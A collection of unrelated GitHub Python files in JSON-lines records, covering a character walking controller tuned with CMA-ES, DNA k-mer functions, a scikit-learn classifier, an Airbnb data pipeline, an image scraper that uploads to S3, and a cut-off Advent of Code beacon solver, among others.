curSeg:\n p.setJointOrientationLocal(lUpLeg, Rl, False)\n p.setJointOrientationLocal(rUpLeg, Rr, False)\n p.setJointOrientationLocal(lKnee, Rlk, False)\n p.setJointOrientationLocal(rKnee, Rrk, False)\n p.setJointOrientationLocal(lFoot, Rlf, False)\n p.setJointOrientationLocal(rFoot, Rrf, False)\n p.updateGlobalT()\n\n d = motion_control[-1] - curSeg[0]\n d.rootPos[1] = 0.\n motion_stitch.extend(ymb.getStitchedNextMotion(curSeg, d, transitionLength, stitch_func, True, False))\n\n else:\n motion_seg_orig.append(motion_seg_orig[-1])\n motion_seg.append(motion_seg[-1])\n motion_stitch.append(motion_control[-1])\n\n\n # rendering\n # motionModel.update(motion_ori[frame])\n if not isCma:\n # dartMotionModel.update(motion_stitch[frame])\n # dartMotionModel.update(motion_stf_balancing[frame])\n dartMotionModel.update(motion_seg[frame])\n # dartMotionModel.update(motion_ori[frame])\n # motionModel.update(motion_seg[frame])\n\n rd_CP[0] = CP\n # rd_CMP[0] = (CMreal[0] - (F[0]/F[1])*CMreal[1], 0, CMreal[2] - (F[2]/F[1])*CMreal[1])\n\n if plot is not None:\n plot.addDataPoint('zero', frame, 0)\n plot.updatePoints()\n\n if not isCma:\n viewer.setSimulateCallback(simulateCallback)\n\n if MULTI_VIEWER:\n viewer.startTimer(frameTime / 1.4)\n else:\n viewer.startTimer(frameTime * .1)\n viewer.show()\n\n Fl.run()\n else:\n objectiveSum = 0\n successSum = 0\n comSum = 0\n velSum = 0\n dirSum = 0\n\n for i in range(MAX_FRAME):\n simulateCallback(i)\n\n _com = dartModel.getCOM()\n\n if i > 50:\n successSum -= 1\n\n comSum += _com[2] * _com[2]\n\n _com_vel = dartModel.skeleton.com_velocity()\n _com_vel[1] = 0.\n velSum += (np.linalg.norm(_com_vel) - 0.7)*(np.linalg.norm(_com_vel)-0.7)\n\n dirDiff = mm.normalize(_com_vel) - np.array((-1., 0., 0.))\n dirSum += np.dot(dirDiff, dirDiff)\n\n if _com[1] < 0.65 or _com[1] > 1.0:\n break\n if i % 50 == 0 and (np.isnan(velSum) or np.isnan(dirSum)):\n break\n\n # objectiveSum = successSum + .3*comSum + velSum\n objectiveSum = successSum + velSum + .3*dirSum\n # print(objectiveSum, successSum, velSum, .3*dirSum, params)\n del motion_stitch[:]\n del motion_debug1[:]\n del motion_debug2[:]\n del motion_debug3[:]\n del motion_control[:]\n del motion_stf_balancing[:]\n del motion_match_stl[:]\n del motion_ori[:]\n del motion_seg[:]\n del motion_seg_orig[:]\n del motion_stf_push[:]\n del motion_stf_stabilize[:]\n del motion_swf_height[:]\n del motion_swf_placement[:]\n del motion_swf_orientation[:]\n return float(objectiveSum), float(successSum), float(velSum), float(.3*dirSum)\n # return float(objectiveSum)\n\n\nif __name__ == '__main__':\n # c_min_contact_vel = 100.\n # c_min_contact_time = .7\n # c_landing_duration = .2\n # c_taking_duration = .3\n # c_swf_mid_offset = .0\n # c_locking_vel = .05\n # c_swf_offset = .01\n\n # K_stp_pos = 0.\n # c5 = .7\n # c6 = .02\n # K_stb_vel = .1\n # K_stb_pos = .1\n # K_swp_vel_sag = .0\n # K_swp_vel_cor = 1.3\n # K_swp_pos_sag = 1.2\n # K_swp_pos_cor = 1.\n # K_swp_pos_sag_faster = .05\n\n # viewer.objectInfoWnd.add1DSlider(\"c_min_contact_vel\", 0., 200., .2, 100.)\n # viewer.objectInfoWnd.add1DSlider(\"c_min_contact_time\", 0., 5., .01, .7)\n # viewer.objectInfoWnd.add1DSlider(\"c_landing_duration\", 0., 5., .01, .2)\n # viewer.objectInfoWnd.add1DSlider(\"c_taking_duration\", 0., 5., .01, .3)\n # viewer.objectInfoWnd.add1DSlider(\"c_swf_mid_offset\", -1., 1., .001, 0.)\n # viewer.objectInfoWnd.add1DSlider(\"c_locking_vel\", 0., 1., .001, .05)\n # viewer.objectInfoWnd.add1DSlider(\"c_swf_offset\", -1., 1., .001, .01)\n\n # 
viewer.objectInfoWnd.add1DSlider(\"K_stp_pos\", 0., 1., .01, 0.)\n # viewer.objectInfoWnd.add1DSlider(\"c5\", 0., 5., .01, .7)\n # viewer.objectInfoWnd.add1DSlider(\"c6\", 0., 1., .01, .02)\n # viewer.objectInfoWnd.add1DSlider(\"K_stb_vel\", 0., 1., .01, .1)\n # viewer.objectInfoWnd.add1DSlider(\"K_stb_pos\", 0., 1., .01, .1)\n # viewer.objectInfoWnd.add1DSlider(\"K_swp_vel_sag\", 0., 5., .01, 0.)\n # viewer.objectInfoWnd.add1DSlider(\"K_swp_vel_cor\", 0., 5., .01, 1.3)\n # viewer.objectInfoWnd.add1DSlider(\"K_swp_pos_sag\", 0., 5., .01, 1.2)\n # viewer.objectInfoWnd.add1DSlider(\"K_swp_pos_cor\", 0., 5., .01, 1.)\n # viewer.objectInfoWnd.add1DSlider(\"K_swp_pos_sag_faster\",0., 1., .01, .05)\n\n\n # walkings(None, False)\n\n\n # hand tuning\n # params = [0., .7, .02, .1, .1, .0, 1.3, 1.2, 1., .05]\n # 325 frames success, Ks = 600.\n params = [ 0.01918975, 0.86622863, 0.15111008, 0.50972221, 0.09746768, -0.09129272, 1.12736657, 1.2873114 , 0.84409227, 0.38928674]\n\n # 347 frames success, Ks = 600. ????????\n # params = [-0.0096717475861028673, 0.51455174209881782, 0.1414213562373095, 0.31622776601683794, 0.19555994814530026, 0.0, 1.1401754250991381, 1.457290633087426, 0.78654212710618387, 0.61027611069961429]\n\n # 287 frames success, Ks = 1000.\n # params = [-0.15744347, 0.67592998, 0.14142136, 0.31622777, 0.35696289, 0., 1.14017543, 1.27637941, 0.95735647, 0.23835687]\n\n\n\n # 400 frames success, box foot, LCP, Kp = 200, Kd = 20\n # params = [-0.11523854, 0.56103475, 0.14142136, 0.31622777, 0.13175649, 0. , 1.14017543, 1.18703622, 0.77193057, 0.20490717]\n\n # infinite frames success, box foot, LCP, Kp = 200, Kd = 20, foot Kp = 80, foot Kd = 10\n params = [-0.13880733, 0.3439617, 0.14142136, 0.31622777, -0.18792631, 0., 1.14017543, 1.53473264, 1.07681499, 0.22992996]\n\n\n # 1220 frames success, parameter rounding, box foot, LCP, Kp = 200, Kd = 20, foot Kp = 80, foot Kd = 10,\n params = [-0.11608721, 0.42672724, 0.14142136, 0.31622777, -0.12770363, 0., 1.14017543, 1.63989139, 1.01964141, 0.18439344]\n\n # 1850 frames success, parameter rounding, box foot, LCP, Kp = 200, Kd = 20, foot Kp = 80, foot Kd = 10,\n params = [-0.10540525, 0.40167391, 0.14142136, 0.31622777, -0.06906434, 0., 1.14017543, 1.57445634, 1.01106981, 0.23834485]\n\n # infinite frames success, parameter rounding, box foot, LCP, Kp = 200, Kd = 20, foot Kp = 80, foot Kd = 10,\n # params = [-0.03424024, 0.32955692, 0.0850351 , 0.28576747, -0.10735104, 0.00185764, 1.36932697, 1.27616424, 0.97477866, 0.29608671]\n\n params = [ 0.23265769, 1.04283873, -0.29465862, 0.3544647, 0.2997252, -0.17338881, 2.08012922, 1.09571025, 0.6792339, -0.35920458]\n\n # DartTrackingFoot0 result, c_swf_mid_offset = 0.02\n params = [ 0.00745384, -0.56053261, 0.00921962, 0.42575388, 1.03165526, 0.69931117, 1.42782163, 1.65119398, 1.1237301 , 0.5327249 ]\n\n params = [0., .7, .02, .1, .1, .0, 1.3, 1.2, 1., .05]\n params = [ 0.52572998, 0.15153905, -0.59859175, 0.93952107, 0.49886098, -0.1271257, 0.7328913, 0.87975694, 1.73943837, -0.97777014]\n\n # 120 frames success\n params = [-0.03373822, 0.21621505, -0.46121163, 0.97844009, 1.26921316, 0.07107696, 1.43362972, 0.10045292, 1.40123327, -0.67596869]\n\n # 195 frames success\n params = [-0.156885745146, 0.224351871531, -0.651388957459, 0.803834992348, 1.05714177435, 0.00542880291931, 1.56462249867, -0.111631227361, 1.37037255808, -1.00517210154]\n isCma = False\n\n params = [-0.156885745146, 0.224351871531, 0., 0.803834992348, 1.05714177435, 0.00542880291931, 1.56462249867, -0.111631227361, 
1.37037255808, -1.00517210154]\n if len(sys.argv) == 1 and not isCma:\n walkings(params, False)\n elif len(sys.argv) == 2 and sys.argv[1] == '-view' and not isCma:\n walkings(params, False)\n elif (len(sys.argv) == 2 and sys.argv[1] == '-cma') or isCma:\n # from PyCommon.modules.Math.Nomalizer import Normalizer\n # normalizer = Normalizer([0.]*10., [1., 5., .2, 1., 1., 3., 3., 3., 3., .5], [1.]*10, [-1.]*10)\n # c6, K_stb_vel, K_swp_vel_sag, K_swp_vel_cor is velocity gain\n # cmaOption = cma.CMAOptions('fixed_variables')\n # cmaOption.set('fixed_variables', {2:math.sqrt(.02), 3:math.sqrt(.1), 5:math.sqrt(0.), 6:math.sqrt(1.3)})\n # cma.fmin(walkings, np.sqrt([0., .5, .02, .1, .1, .0, 0.3, 1.2, .5, .05]).tolist(), .1, args=(True,), options=cmaOption)\n # cma.fmin(walkings, params, .1, args=(True,), options=cmaOption)\n # cma.fmin(walkings, params, .1, args=(True,))\n\n from datetime import datetime\n filename = datetime.now().strftime('%Y%m%d%H%M')+\".opt\"\n fout = open(filename, \"w\")\n fout.write(os.path.basename(__file__)+'\\n')\n es = cma.CMAEvolutionStrategy(params, .1,\n {'maxiter':100})\n fout.close()\n # {'maxiter':2, 'fixed_variables':{2:math.sqrt(.02), 3:math.sqrt(.1), 5:math.sqrt(0.), 6:math.sqrt(1.3)}})\n pool = mp.Pool(es.popsize)\n cmaCount = 0\n while not es.stop():\n fout = open(filename, \"a\")\n X = es.ask()\n f_values = pool.map_async(walkings, X).get()\n obj_values = [f_value[0] for f_value in f_values]\n es.tell(X, obj_values)\n es.disp()\n es.logger.add()\n\n print(cmaCount, min(f_values), X[np.argmin(obj_values)])\n fout.write(str(cmaCount)+' '+str(min(f_values)))\n for x in X[np.argmin(obj_values)]:\n fout.write(' '+str(x)+',')\n fout.write('\\n')\n cmaCount += 1\n fout.close()\n\n print(\"------------best-----------\")\n print(\"eval: \", es.best.evals)\n print(\"f: \", es.best.f)\n print(\"x: \", es.best.x)\n","repo_name":"hpgit/HumanFoot","sub_path":"DartWalkingFoot/main_DartTrackingFoot1.py","file_name":"main_DartTrackingFoot1.py","file_ext":"py","file_size_in_byte":100314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19211165399","text":"import collections\nimport itertools\nimport ReverseComplement\n\n\nNUCLEOTIDES = set('ACGT')\n\n\nclass Error(Exception):\n \"\"\"Base error.\"\"\"\n\n\ndef HammingDistance(input1, input2, max_d=None):\n max_d = max_d or float('inf')\n input1_length, input2_length = len(input1), len(input2)\n min_length = min(input1_length, input2_length)\n result = abs(input1_length - input2_length)\n for i1, i2 in itertools.izip(input1, input2):\n if i1 != i2:\n result += 1\n if result > max_d:\n return result\n return result\n\n\ndef AppPatternMatch(pattern, text, d):\n pattern_length = len(pattern)\n return [str(i)\n for i in xrange(len(text)-pattern_length+1)\n if HammingDistance(pattern,\n text[i:i+pattern_length],\n max_d=d)\n <= d]\n\n\ndef AppPatternCount(pattern, text, d):\n return len(AppPatternMatch(pattern, text, d))\n\n\ndef FreqKmerMismatch(text, k, d):\n counter = collections.Counter()\n freq = 0\n for kmer in GetKmers(text, k):\n counter[kmer] = AppPatternCount(kmer, text, d)\n freq = max(freq, counter[kmer])\n # Get k-mers that have max frequency and can be found in text.\n kmers = {kmer for kmer, count in counter.iteritems()\n if count == freq}\n # Get other possible k-mers that cannot be found in text.\n possible_kmers = {kmer2 for kmer1 in kmers for kmer2 in GetPossibleKmers(kmer1, d)\n if (kmer2 not in counter and\n AppPatternCount(kmer2, text, d) == 
freq)}\n    return sorted(kmers.union(possible_kmers))\n\n\ndef FreqKmerMismatchReverse(text, k, d):\n    counter = collections.Counter()\n    freq = 0\n    for kmer in GetMismatchKmers(text, k, d):\n        counter[kmer] = GetKmersReversePatternCount(kmer, text, d)\n        freq = max(freq, counter[kmer])\n    kmers = {kmer for kmer, count in counter.iteritems()\n             if count == freq}\n    return sorted(kmers)\n\n\ndef GetKmers(text, k):\n    kmers = {text[i:i+k] for i in xrange(len(text)-k+1)}\n    return kmers\n\n\ndef GetMismatchKmers(text, k, d):\n    kmers = {text[i:i+k] for i in xrange(len(text)-k+1)}\n    possible_kmers = {kmer2\n                      for kmer1 in kmers\n                      for kmer2 in GetPossibleKmers(kmer1, d)}\n    return kmers.union(possible_kmers)\n\n\ndef GetKmersReversePatternCount(kmer, text, d):\n    reverse_kmer = ReverseComplement.ReverseComplement(kmer)\n    return AppPatternCount(kmer, text, d) + AppPatternCount(reverse_kmer, text, d)\n\n\ndef GetPossibleKmers(k, d):\n    for index_tuple in itertools.combinations(xrange(len(k)), d):\n        # Find all possible bases that can be changed in k-mer's positions.\n        for base_tuple in itertools.product(NUCLEOTIDES, repeat=d):\n            if not OverlapBases(k, index_tuple, base_tuple):\n                k_list = list(k)\n                for index, base in itertools.izip(index_tuple, base_tuple):\n                    k_list[index] = base\n                yield ''.join(k_list)\n\n\ndef OverlapBases(k, index_tuple, base_tuple):\n    for index, base in itertools.izip(index_tuple, base_tuple):\n        if k[index] == base:\n            return True\n    return False\n\n\ndef NeighborsOld(pattern, d):\n    if not d:\n        return pattern\n    if len(pattern) == 1:\n        return NUCLEOTIDES\n    first, suffix = pattern[0], pattern[1:]\n    neighbors = set()\n    suffix_neighbors = Neighbors(suffix, d)\n    for n in suffix_neighbors:\n        if HammingDistance(suffix, n) < d:\n            neighbors.update(s + n for s in NUCLEOTIDES)\n        else:\n            neighbors.add(first + n)\n    return neighbors\n\n\ndef Neighbors(pattern, d):\n    if not d:\n        return set([pattern])\n    if len(pattern) == 1:\n        return NUCLEOTIDES\n    first, suffix = pattern[0], pattern[1:]\n    neighbors = set()\n    for n in Neighbors(suffix, d):\n        neighbors.add(first + n)\n    suffix_neighbors = Neighbors(suffix, d-1)\n    for s in NUCLEOTIDES:\n        neighbors.update(s + n for n in suffix_neighbors)\n    return neighbors\n","repo_name":"hkpcmit/BioInfo","sub_path":"HammingDistance.py","file_name":"HammingDistance.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
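# A minimal usage sketch for the HammingDistance record above. This is hypothetical driver code,
# not part of the original file: it assumes Python 2 (the module relies on xrange, itertools.izip
# and dict.iteritems) and that HammingDistance.py plus its ReverseComplement dependency are
# importable from the working directory.
import HammingDistance as hd

assert hd.HammingDistance('ACGT', 'ACCT') == 1        # exactly one mismatch, at position 2
# 0-based start offsets where the pattern occurs with at most d=1 mismatches:
print(hd.AppPatternMatch('ATTCTGGA', 'TTATTCTGCA', 1))  # -> ['2']
# All 3-mers within Hamming distance 1 of 'ACG' (10 strings, including 'ACG' itself):
print(sorted(hd.Neighbors('ACG', 1)))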
+{"seq_id":"13324525326","text":"\n# Data description: mobile phone price prediction (target variable: price_range)\n# Data source: https://www.kaggle.com/iabhishekofficial/mobile-price-classification?select=train.csv\n# Problem type: classification (multiclass)\n# Evaluation metric: accuracy\n\nimport pandas as pd\ntrainData = pd.read_csv('https://raw.githubusercontent.com/Datamanim/datarepo/main/mobile/train.csv')\ntestData = pd.read_csv('https://raw.githubusercontent.com/Datamanim/datarepo/main/mobile/test.csv')\n\n\n# --------------------------------- \n# 1. Explore the data\n# 1-1. Check missing values: None\nprint(trainData.isnull().sum().sum(), testData.isnull().sum().sum())\n\n# 1-2. Check object columns: None\nprint(trainData.select_dtypes('object').columns)\nprint(testData.select_dtypes('object').columns)\n\n# 1-3. Columns to exclude: ['id']\nprint(trainData.columns)\nprint(testData.columns)\ntestData.drop(columns=['id'], inplace=True)\n\n# 1-4. Define X and y\nX = trainData.drop(columns=['price_range'])\ny = trainData['price_range']\nprint(X.shape, testData.shape, y.shape)\n\n\n# --------------------------------- \n# 2. Preprocessing\nfrom sklearn.preprocessing import StandardScaler\nss = StandardScaler()\nss.fit(X)\nX = pd.DataFrame(ss.transform(X), columns=X.columns)\ntestData = pd.DataFrame(ss.transform(testData), columns=testData.columns)\nprint(X.mean().mean(), X.std().mean())\nprint(testData.mean().mean(), testData.std().mean())\n\n\n# --------------------------------- \n# 3. Train/test split\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, stratify=y, random_state=0)\n\n\n# --------------------------------- \n# 4. Modeling, training, prediction, evaluation\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nrf = RandomForestClassifier()\nrf.fit(X_train, y_train)\nprint(accuracy_score(rf.predict(X_test), y_test))\n\n\n# --------------------------------- \n# 5. Submission\ntestData['predict'] = rf.predict(testData)\ntestData[['predict']].to_csv('수험번호.csv', index=False)\n","repo_name":"parkmina365/Bigdata_Analyst_Certificate","sub_path":"작업형2유형/Classification/Mobile Price Classification.py","file_name":"Mobile Price Classification.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
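# A small companion sketch for the classification walkthrough above (hypothetical, not part of the
# original record): 5-fold cross-validated accuracy is a steadier estimate than the single 80/20
# split used there. X and y are assumed to be the scaled features and target built in the record.
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score

cv_scores = cross_val_score(RandomForestClassifier(random_state=0), X, y, cv=5, scoring='accuracy')
print(cv_scores.mean(), cv_scores.std())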
data.drop(['id', 'room_type'], axis=1)\n data = data.drop(['description', 'amenities'], axis=1)\n return data\n\n def generate_features(self):\n listings_df = pd.read_csv(self.listings_url)\n calendar_df = pd.read_csv(self.calendar_url, parse_dates=['date'])\n listings_features = Listings(listings_df).generate_features()\n calendar_features = Calendar(calendar_df).generate_features()\n\n merged_features = self.__merge_listings_and_calendar(listings_features, calendar_features)\n merged_features = self.__fill_missing_data(merged_features)\n merged_features, aux_model_file = AuxModel(merged_features).train_and_save()\n merged_features = self.__drop_data(merged_features)\n default_features = merged_features.mean(axis=0).drop(labels=[\n 'price_year_avg', 'price_winter_avg', 'price_spring_avg', 'price_summer_avg', 'price_fall_avg',\n 'available_winter_avg', 'available_spring_avg', 'available_summer_avg', 'available_fall_avg',\n 'min_nights_winter_avg', 'min_nights_spring_avg', 'min_nights_summer_avg', 'min_nights_fall_avg'\n ])\n for idx, val in default_features.items():\n if idx != 'latitude' and idx != 'longitude' and idx != 'min_nights_year_avg' and idx != 'available_year_avg':\n default_features[idx] = round(val)\n default_features.to_json('default_features.json')\n return merged_features, aux_model_file\n","repo_name":"bruceplai/ml-capstone","sub_path":"merge_pipeline.py","file_name":"merge_pipeline.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28692742901","text":"import boto3\nimport requests\nimport time\nimport os\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse\ndef handler(event,context):\n r = requests.get(\"https://misanimales.com/\")\n s3 = boto3.resource('s3')\n soup = BeautifulSoup(r.text, 'html.parser')\n images = soup.find_all(\"img\")\n for image in images:\n url = image.get(\"src\")\n if url.startswith(\"http\"):\n a = urlparse(url)\n archivo=os.path.basename(a.path)\n img_file= requests.get(url)\n f=open(f\"/tmp/{archivo}\",\"wb\")\n f.write(img_file.content)\n f.close()\n s3.meta.client.upload_file(f\"/tmp/{archivo}\", \"bucketparaguardarfotos\",f'imagenes/{archivo}')\n return {\n 'statusCode': 200\n }","repo_name":"Trolmico/Parcial3BigData","sub_path":"1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"33018187581","text":"import numpy as np\n\n# sample input\nannotations = np.array([[1, 1, -1, 0, -1],\n [0, 1, 5, 23, 23],\n [0, 0, -1, 1, 1]])\n\n# add one to all elements so -1 becomes 0\nannotations += 1\n\n# get the bincount along axis 1 for the unique values\n# equivalent to bincounts = np.array([np.bincount(row, minlength=np.max(annotations)+1) for row in annotations])\nbincounts = np.apply_along_axis(np.bincount, axis=1, arr=annotations, minlength=np.max(annotations)+1)\nprint(bincounts)\n\n# set the count for 0 to 0\nbincounts[:, 0] = 0\n\n# get the majority vote, and subtract 1 so 0 becomes -1 again\nmaj_vote = np.argmax(bincounts, axis=1) - 1\n\nprint(maj_vote)","repo_name":"minnesotanlp/annotation-imputation","sub_path":"utilities/variance_disagreement_graphs/quick_test.py","file_name":"quick_test.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"5801367356","text":"# from sklearn import tree \n# #创建训练集\n# X= 
[[0,0],[1,1]]\n# Y = [0,1]\n\n# clf = tree.DecisionTreeClassifier()\n# clf = clf.fit(X,Y)\n# # Predict\n# c = clf.predict([[3.,3.]])\n# print(c)\n# # Predict the probability of each class\n# d = clf.predict_proba([[2., 2.]])\n# print(d)\n\n# Use the iris dataset\nfrom sklearn.datasets import load_iris\nfrom sklearn import tree \niris = load_iris() # keep the full dataset object: feature_names and target_names are used below\nX, y = iris.data, iris.target\nclf = tree.DecisionTreeClassifier()\nclf = clf.fit(X,y)\ntree.plot_tree(clf) \n\nimport graphviz \ndot_data = tree.export_graphviz(clf,out_file=None)\ngraph = graphviz.Source(dot_data)\ngraph.render(\"iris\")\ndot_data = tree.export_graphviz(clf, out_file=None, \n feature_names=iris.feature_names, \n class_names=iris.target_names, \n filled=True, rounded=True, \n special_characters=True) \ngraph = graphviz.Source(dot_data) \ngraph \n\n","repo_name":"zrshizr/Machine-Learning","sub_path":"Decision_tree.py","file_name":"Decision_tree.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19781227332","text":"import mysql.connector\nimport pandas as pd\nimport numpy as np\nimport decimal\n\n#connect to database\ncnx = mysql.connector.connect(host='127.0.0.1', database='Fidelis', user='root')\n\n#create cursor\ncursor = cnx.cursor(buffered=True)\n\n#Get each user's total positive vote rep, negative vote rep and comment rep.\n#Returns table in the form: user_id, positive, negative, comment.\nquery = (\"SELECT post_id, ((COUNT(post_id) - 1) * 0.2) AS comments, (up_votes * 0.1) AS positive, (down_votes * 0.1) AS negative FROM comments GROUP BY post_id\")\ncursor.execute(query)\n\nd = pd.DataFrame(np.zeros((cursor.rowcount, 2)))\n\n#for each tuple...\ncount = 0\nfor post_id, comments, positive, negative in cursor:\n reputation = positive - negative\n\n #Make sure 'comments' field is not empty (Only returns number when there is at least one comment)\n if(isinstance(comments, decimal.Decimal)):\n reputation += comments\n\n #update data frame to store reputations\n d.set_value(count, 0, post_id)\n d.set_value(count, 1, reputation)\n\n count += 1\n\n#get min and max recorded reputation scores, then find difference between them\nmin_rep = d[1].min()\nmax_rep = d[1].max()\ndiff = max_rep - min_rep\n\n#if min = max, all have same reputation score, scale all scores to 0\nif(diff == 0):\n d[1] = 0\nelse:\n #scale between 0 and 1 and update reputation values in database\n d[1] = d[1].apply(lambda x: (x - min_rep)/(diff))\n\n#iterate through each row of dataframe and update users table with new reputation value\nfor ind, row in d.iterrows():\n add_rep = (\"UPDATE posts SET reputation = {} WHERE id = {}\".format(row[1], row[0]))\n cursor.execute(add_rep)\n cnx.commit()\n\n#close cursor and connection to database\ncursor.close()\ncnx.close()","repo_name":"ntanzeel/Fidelis","sub_path":"scripts/Reputation Scoring/Post_Rep_Score.py","file_name":"Post_Rep_Score.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"74301284527","text":"import copy\n\nimport aibox\nimport pytest\nfrom aibox.config import (\n SUPPORTED_INIT_ARGS_KEYS,\n SUPPORTED_INIT_TARGET_KEYS,\n config_from_dict,\n init_from_cfg,\n ConfigDict,\n)\nfrom aibox.utils import as_path\nfrom omegaconf import DictConfig\n\n\ndef make_config_variations():\n specs = []\n for target_key in SUPPORTED_INIT_TARGET_KEYS:\n # No args\n specs.append(\n (\n f\"targetonly-noargs-{target_key}\",\n {\n target_key: \"aibox.config.ConfigDict\",\n },\n )\n )\n 
# With args\n specs.append(\n (\n f\"targetonly-args-{target_key}\",\n {\n target_key: \"aibox.config.ConfigDict\",\n \"a\": 2,\n },\n )\n )\n # With args and other keys\n for arg_key in SUPPORTED_INIT_ARGS_KEYS:\n specs.append(\n (\n f\"paired-{target_key}-{arg_key}\",\n {\n target_key: \"aibox.config.ConfigDict\",\n arg_key: {\"a\": 2},\n \"other\": {\n \"something_that_should_not_be_touched\": 10000,\n \"nested_dicts\": {\"a\": 1, \"b\": {\"c\": 2}},\n },\n },\n )\n )\n\n # Deprecated structure\n specs.extend(\n [\n (\n \"deprecated-1\",\n {\n \"target\": \"aibox.config.ConfigDict\",\n \"kwargs\": {\"a\": 2},\n \"other\": {\"something_that_should_not_be_touched\": 10000},\n },\n ),\n (\n \"deprecated-2\",\n {\n \"class_path\": \"aibox.config.ConfigDict\",\n \"args\": {\"a\": 2},\n \"other\": {\"something_that_should_not_be_touched\": 10000},\n },\n ),\n ]\n )\n return specs\n\n\n@pytest.mark.parametrize(\"name,config\", make_config_variations())\ndef test_config_parse(name, config):\n # TODO: test cases that should fail well\n config_copy = copy.deepcopy(config)\n callback = init_from_cfg(config)\n if \"-args-\" in name:\n assert callback.a == 2\n assert config_copy == config\n if \"other\" in config:\n assert (\n config[\"other\"][\"something_that_should_not_be_touched\"] == 10000\n ), f\"Other keys should not be touched: {name}\"\n\n\n@pytest.mark.parametrize(\"name,config\", make_config_variations())\ndef test_config_dict(name, config):\n config = ConfigDict(**config)\n callback = init_from_cfg(config)\n\n assert isinstance(callback, ConfigDict)\n if \"-args-\" in name:\n assert callback.a == 2\n if \"other\" in config:\n assert isinstance(config[\"other\"], ConfigDict)\n assert not isinstance(config[\"other\"].to_dict(), ConfigDict)\n if \"nested_dicts\" in config[\"other\"]:\n assert isinstance(config[\"other\"][\"nested_dicts\"], ConfigDict)\n assert not isinstance(config[\"other\"][\"nested_dicts\"].to_dict(), ConfigDict)\n assert (\n config[\"other\"][\"something_that_should_not_be_touched\"] == 10000\n ), f\"Other keys should not be touched: {name}\"\n\n\ndef test_config_conversion():\n config_dict = ConfigDict()\n config_dict.__classpath__ = \"aibox.config.ConfigDict\"\n config_dict.a = 2\n config = config_from_dict(config_dict)\n assert isinstance(config, DictConfig), f\"Expected DictConfig, got {type(config)}\"\n\n\ndef test_as_path_resolver():\n user_dir = as_path(\"~\")\n config = ConfigDict()\n config.root_dir = \"${as_path:'~'}\"\n config = config_from_dict(config)\n assert str(config.root_dir) == str(user_dir), f\"Expected {user_dir}, got {config.root_dir}\"\n","repo_name":"dk0d/aibox","sub_path":"tests/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"20708518832","text":"import datetime\n\nfrom connection import connection_handler\n\n\n@connection_handler\ndef get_applicants_who_made_a_test_between_two_dates(cursor, date_from=\"\", date_to=\"\") -> list[dict]:\n if not date_from:\n date_from = str((datetime.datetime.strptime(date_to, \"%Y-%m-%d\") - datetime.timedelta(days=14)).date())\n if not date_to:\n date_to = str(datetime.date.today())\n\n query = \"\"\"\n SELECT DISTINCT u.username, CONCAT(u.last_name, ' ', u.first_name) AS full_name, u.email\n FROM result_header rh\n JOIN users u on u.id = rh.user_id\n WHERE rh.date BETWEEN %s AND %s\n \"\"\"\n cursor.execute(query, (date_from, date_to))\n return cursor.fetchall(), 
date_from, date_to","repo_name":"xKeiro/Evangelion","sub_path":"data_manager/common_queries.py","file_name":"common_queries.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17468373486","text":"import re\nimport sys\nimport argparse\nimport math\n\nfrom collections import defaultdict, Counter\n\nimport sys\nsys.path.append('../')\n\nfrom executor import *\nfrom helpers import *\n\nfrom itertools import permutations, product, combinations\nimport numpy as np\n\ndef get_rotation_matrices():\n matrices = []\n\n for order in permutations([0, 1, 2]):\n\n signs = [[1, -1]] * 3\n\n for x, y, z in product(*signs):\n matrix = create_matrix(3, 3, 0)\n\n matrix[0][order[0]] = x\n matrix[1][order[1]] = y\n matrix[2][order[2]] = z\n\n if np.linalg.det(matrix) == 1:\n matrices.append(matrix)\n\n return matrices\n\ndef transform(distances, m):\n new = create_matrix(len(distances[0]), len(distances), [0, 0, 0])\n\n for i in range(len(distances)):\n for j in range(len(distances[0])):\n new[i][j] = list(np.matmul(m, distances[i][j]))\n\n return new\n\ndef count_matches(rowA, rowB):\n rowA = [tuple(element) for element in rowA]\n rowB = [tuple(element) for element in rowB]\n\n sA = set(rowA)\n sB = set(rowB)\n\n return len(sA.intersection(sB))\n\nclass Translation:\n def __init__(self, matrix, pos):\n self.matrix = matrix\n self.pos = pos\n\ndef extract_match(rowA, rowB):\n result = {}\n\n for i, a in enumerate(rowA):\n for j, b in enumerate(rowB):\n if a == b:\n return (i, j)\n\ndef diff(c1, c2):\n return [c1[i] - c2[i] for i in range(3)]\n\ndef add(c1, c2):\n return [c2[i] + c1[i] for i in range(3)]\n\ndef negate(c1):\n return [-c1[i] for i in range(3)]\n\ndef p1(raw, lines, sections, nums, *args, **kwargs):\n # Input parsing: store the measurements from each scanner in a multidimensional array\n beacons = []\n\n for section in sections:\n section = section[1:]\n\n row = []\n for line in section:\n row.append(stoil(line.split(',')))\n\n beacons.append(row)\n\n # Compute relative distances between all beacons: this is how we determine overlap\n # all_distances[i][j][k][l] represents the distances between beacons for scanner i 